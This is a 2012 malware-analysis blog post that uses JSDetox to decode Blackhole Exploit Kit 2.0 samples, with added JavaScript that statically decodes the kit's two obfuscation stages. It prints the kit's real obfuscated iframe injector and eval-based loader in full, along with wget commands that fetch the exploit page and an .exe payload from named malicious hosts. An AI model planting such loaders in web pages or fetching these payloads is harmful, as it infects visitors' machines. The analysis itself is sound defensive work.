Thursday, September 27, 2012

Analyzing the Blackhole Exploit Kit 2.0 with JSDetox

With the release of the new Blackhole Exploit Kit version, I wanted to check if JSDetox is still able to analyze it. As it turns out, the process is not much different from the last version (shown in this screencast).
I checked http://www.malwaredomainlist.com/update.php to find a current sample. Of course you should not visit those URLs with your normal browser as they contain malware - I will not "hide" those URLs here as they are publicly documented (and seem to have been taken offline by now). The same applies to the tool JSDetox: you should run it in an isolated environment.

The obfuscated iframe leading to the exploit kit sounds interesting, so let's use that one:
wget -O pho.htm "basijkarmandan.danaportal.ir/pho.htm"
The downloaded file contains this:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>

<h1><b>Please wait a moment. You will be forwarded...</h1></b>


<script>v="va"+"l";try{ebgserb++;}catch(snregrx){try{gnezrg|326}catch(ztbet){m=Math;ev=window[""+"e"+v];}ff="fromC"+"ha";if(020==0x10)ff+="rCode";n="25&&26&&121&&119&&48&&57&&116&&128&&115&&134&&125&&118&&126&&133&&62&&120&&117&&133&&85&&125&&117&&126&&117&&127&&132&&132&&82&&138&&100&&114&&119&&95&&113&&126&&117&&57&&55&&115&&127&&117&&137&&56&&57&&108&&64&&110&&57&&140&&29&&26&&25&&26&&121&&119&&130&&114&&125&&118&&130&&57&&57&&76&&29&&26&&25&&142&&48&&118&&124&&132&&117&&49&&139&&30&&25&&26&&25&&117&&127&&116&&133&&126&&117&&127&&132&&63&&135&&131&&121&&133&&117&&57&&50&&77&&121&&119&&130&&114&&125&&118&&48&&132&&130&&116&&77&&56&&120&&133&&132&&129&&74&&64&&63&&122&&127&&129&&127&&127&&117&&132&&124&&114&&124&&63&&130&&134&&74&&73&&64&&73&&64&&64&&118&&128&&130&&134&&125&&64&&124&&122&&126&&124&&131&&64&&115&&128&&124&&134&&125&&127&&62&&129&&120&&129&&55&&49&&135&&122&&116&&133&&120&&78&&55&&66&&64&&56&&48&&121&&117&&122&&119&&121&&132&&78&&55&&66&&64&&56&&48&&132&&132&&138&&124&&118&&77&&56&&134&&122&&131&&122&&114&&122&&124&&122&&132&&138&&74&&121&&121&&117&&116&&118&&126&&76&&128&&128&&131&&122&&132&&122&&127&&127&&74&&114&&114&&132&&127&&125&&133&&133&&117&&76&&124&&118&&118&&133&&74&&65&&75&&133&&127&&129&&74&&65&&75&&56&&78&&77&&63&&122&&118&&131&&113&&126&&117&&79&&50&&58&&75&&30&&25&&26&&141&&30&&25&&26&&118&&134&&126&&116&&132&&122&&127&&127&&48&&122&&118&&131&&113&&126&&117&&131&&56&&58&&139&&30&&25&&26&&25&&135&&113&&131&&48&&119&&48&&78&&48&&117&&127&&116&&133&&126&&117&&127&&132&&63&&115&&131&&117&&114&&132&&118&&85&&125&&117&&126&&117&&127&&132&&57&&55&&122&&118&&131&&113&&126&&117&&56&&57&&76&&118&&63&&131&&118&&132&&82&&132&&133&&130&&122&&114&&134&&132&&118&&56&&56&&131&&131&&115&&56&&60&&56&&120&&133&&132&&129&&74&&64&&63&&122&&127&&129&&127&&127&&117&&132&&124&&114&&124&&63&&130&&134&&74&&73&&64&&73&&64&&64&&118&&128&&130&&134&&125&&64&&124&&122&&126&&124&&131&&64&&115&&128&&124&&134&&125&&127&&62&&129&&120&&129&&55&&58&&75&&119&&62&&132&&132
&&138&&124&&118&&62&&135&&121&&132&&121&&115&&121&&125&&121&&133&&137&&78&&55&&121&&121&&117&&116&&118&&126&&56&&75&&119&&62&&132&&132&&138&&124&&118&&62&&129&&127&&132&&121&&133&&121&&128&&126&&78&&55&&114&&114&&132&&127&&125&&133&&133&&117&&56&&75&&119&&62&&132&&132&&138&&124&&118&&62&&125&&117&&119&&132&&78&&55&&65&&55&&76&&118&&63&&131&&133&&137&&125&&117&&63&&132&&128&&128&&78&&55&&65&&55&&76&&118&&63&&131&&118&&132&&82&&132&&133&&130&&122&&114&&134&&132&&118&&56&&56&&135&&122&&116&&133&&120&&56&&60&&56&&65&&65&&55&&58&&75&&119&&62&&132&&117&&133&&81&&133&&132&&131&&121&&115&&133&&133&&117&&57&&55&&121&&117&&122&&119&&121&&132&&56&&60&&56&&65&&65&&55&&58&&75&&30&&25&&26&&25&&117&&127&&116&&133&&126&&117&&127&&132&&63&&119&&118&&132&&86&&124&&118&&125&&118&&126&&133&&131&&83&&137&&101&&113&&120&&94&&114&&125&&118&&56&&56&&114&&128&&116&&138&&55&&58&&107&&65&&109&&63&&113&&129&&128&&118&&126&&117&&83&&121&&121&&125&&116&&57&&118&&58&&75&&30&&25&&26&&141".split("&&");h=2;s="";if(m)for(i=0;i-605!=0;i=1+i){k=i;s+=String[ff](n[i]-(020+i%h));}if(020==0x10)ev(s);}</script>

</body>
</html>
Paste the javascript code into the textbox in the "Code Analysis" tab and click "Execute":

The code tries to call "window.eval()" - click "Show Code" to see what would be executed:

Click "Send to Analyze" to view the code in the code analysis tab and click "Analyze" to see a formatted version of the code:
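For readers who want to understand the first-stage loop without emulating it, here is a static re-implementation of that decoder. This is an added example, not code from the original post or from JSDetox; the scheme it implements is the one visible in pho.htm above (`n.split("&&")`, `h=2`, and `020` being octal 16), and the encoder is only there to build a constructed test vector.

```javascript
"use strict";

// Static re-implementation of the first-stage decoder in pho.htm (added
// example, not code from the post). In the original, n is the "&&"-joined
// number list, h = 2 and 020 is octal for 16 (== 0x10), so character i is
// String.fromCharCode(n[i] - (16 + i % 2)): even positions subtract 16, odd
// positions subtract 17.
function decodeStage1(blob) {
  const n = blob.split("&&");
  let s = "";
  for (let i = 0; i < n.length; i++) {
    s += String.fromCharCode(Number(n[i]) - (16 + i % 2));
  }
  return s;
}

// Inverse of the scheme, used here only to build a constructed test vector so
// the decoder can be exercised offline without touching the live payload.
function encodeStage1(text) {
  const out = [];
  for (let i = 0; i < text.length; i++) {
    out.push(text.charCodeAt(i) + (16 + i % 2));
  }
  return out.join("&&");
}

// First six numbers of the blob quoted on this page; they decode to two tabs
// followed by "if (", the opening of the hidden script.
const PAGE_PREFIX = "25&&26&&121&&119&&48&&57";

// Constructed sample: a harmless statement encoded with the kit's scheme.
const SAMPLE = encodeStage1('document.title = "decoded";');

console.log(JSON.stringify(decodeStage1(PAGE_PREFIX)));
console.log(decodeStage1(SAMPLE));
```

Feeding the full `n` string from the sample into decodeStage1 reproduces what JSDetox shows after "Show Code", which is a useful cross-check when the emulator and a manual decode disagree.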

Downloading the content of the created iframe...
wget -O column.php "http://ioponeslal.ru:8080/forum/links/column.php?qqx=3633370907&mwafe=3307093738070736060b&gisvsv=04&zwhltu=uvlnuxbx&knl=utqwoyzf"
This file contains 29 KB of data and looks like this (shortened):
<html><body><script>g="getElementById";cc="concat";ss=String.fromCharCode;gg="getAttribute";function asd(){try{(alert+"fewfbw")()}catch(adgsdg){window["e"+"v"+"a"+"l"](s);}}</script><u id="google" 
d0="+4442494b46)3d42142o3o$453j3l3q2c%3h443h3f44*254b463h42$433l3r3q22_161k1i1r1i&20161g3q3d&3p3h22162o!3o453j3l3q!2c3h443h3f)44161g3k3d&3q3g3o3h42$223i453q3f$443l3r3q1c(3f1g3e1g3d#1d4b423h44+45423q143i$453q3f443l_3r3q1c1d4b#3f1c3e1g3d#1d4d4d1g3l@432c3h3i3l@3q3h3g223i!453q3f443l#3r3q1c3e1d+4b423h4445!42" 

[snip]

d91="43#3h1c1d234d%3f3d443f3k_1c3h1d4b4d*4442494b47&3l443k1c42%3d1l1d4b43&3k3h3o3o3h(483h3f4544^3h1c423d1o$1d234d4d3f!3d443f3k1c%3h1d4b4d4d+3f3d443f3k@1c3h1d4b4d#4d3f3d443f#3k1c3h4242!3q3r1d4b4d!3g3r3f453p$3h3q441i47_423l443h1c+1b1b1d2343$3h44303l3p&3h3r45441c%3h3q3g3b42#3h3g3l423h)3f441g1q1k)1k1k1k1d23"></u><script>
a=document[g]("google");
s="";
for(i=0;;i++){
r=a[gg]("d"[cc](i));
if(r){s=s+r;}else break;
}
a=s;
k="";
a=a.replace(/[^0-9a-z]/g,k);
s="";
for(i=0;i<a.length;i+=2){
try{gbargre-0x32}catch(sdgsdg){if(020==0x10)s+=ss(parseInt(a.substr(i,2),0x1c));}
}
asd();
</script></body></html>
The last version of the Blackhole Exploit Kit I analyzed stored the obfuscated data in the text content of HTML attributes; this version spreads it across numbered attributes (d0, d1, ...) of one single HTML element. To analyze this in JSDetox, copy the whole content of the file into the textbox in the "HTML Document" tab and click "Extract Scripts":

You are then taken to the "Code Analysis" tab where you can analyze the code (it is a decoding loop) or directly execute the script:

JSDetox logs that the code executed "document.getElementById" (to access the big HTML element containing the obfuscated code) and that it emulated that access with the imported HTML data. JSDetox then catches a call to "window.eval()" and makes it possible to view the code that would be executed (click "Show Code" and then "Send to Analyze").
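The second stage can likewise be decoded statically. This added example (not code from the post or from JSDetox) reproduces the column.php loop: it walks the attributes d0, d1, ... in order until the first missing one, strips every character outside [0-9a-z], and reads each remaining pair of characters as a base-28 number (the `0x1c` passed to parseInt). The attribute map and the sample text are constructed; the short prefix of d0 is quoted from the page above.

```javascript
"use strict";

// Walk d0, d1, ... in order and stop at the first gap, exactly like the kit's
// for(;;) loop over getAttribute("d" + i). attrs is a plain name -> value map
// (e.g. built from a parsed DOM element) rather than a live document.
function collectAttributes(attrs) {
  let s = "";
  for (let i = 0; ; i++) {
    const r = attrs["d" + i];
    if (r === undefined) break;
    s += r;
  }
  return s;
}

// Drop the junk characters, then decode each base-28 pair into one character.
function decodeStage2(joined) {
  const a = joined.replace(/[^0-9a-z]/g, "");
  let s = "";
  for (let i = 0; i < a.length; i += 2) {
    s += String.fromCharCode(parseInt(a.substr(i, 2), 28));
  }
  return s;
}

// Inverse used only to construct an offline test vector. A "$" is sprinkled in
// after every third character to exercise the junk filter the way the kit's
// "+ ) $ % _" separators do.
function encodeStage2(text) {
  let out = "";
  for (let i = 0; i < text.length; i++) {
    const code = text.charCodeAt(i).toString(28);
    out += (code.length === 1 ? "0" + code : code) + (i % 3 === 0 ? "$" : "");
  }
  return out;
}

// First bytes of the d0 attribute quoted on this page.
const PAGE_D0_PREFIX = "+4442494b46)3d42142o";

// Constructed sample split across three attributes, as the kit does.
const joined = encodeStage2('var x = "hello world";');
const SAMPLE_ATTRS = { id: "google", d0: joined.slice(0, 10), d1: joined.slice(10, 25), d2: joined.slice(25) };

console.log(decodeStage2(PAGE_D0_PREFIX));
console.log(decodeStage2(collectAttributes(SAMPLE_ATTRS)));
```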

Click "Reformat" to make the code readable. At the end of the code, we find this:

Downloading the file:
wget -O cee0c21.exe "http://ioponeslal.ru:8080/forum/links/column.php?qqx=3633370907&mwafe=3307093738070736060b&gisvsv=04&zwhltu=uvlnuxbx&knl=utqwoyzf"
A check on VirusTotal gives a detection rate of 6/43; a few hours later it was 11/43, with some major vendors still missing it:
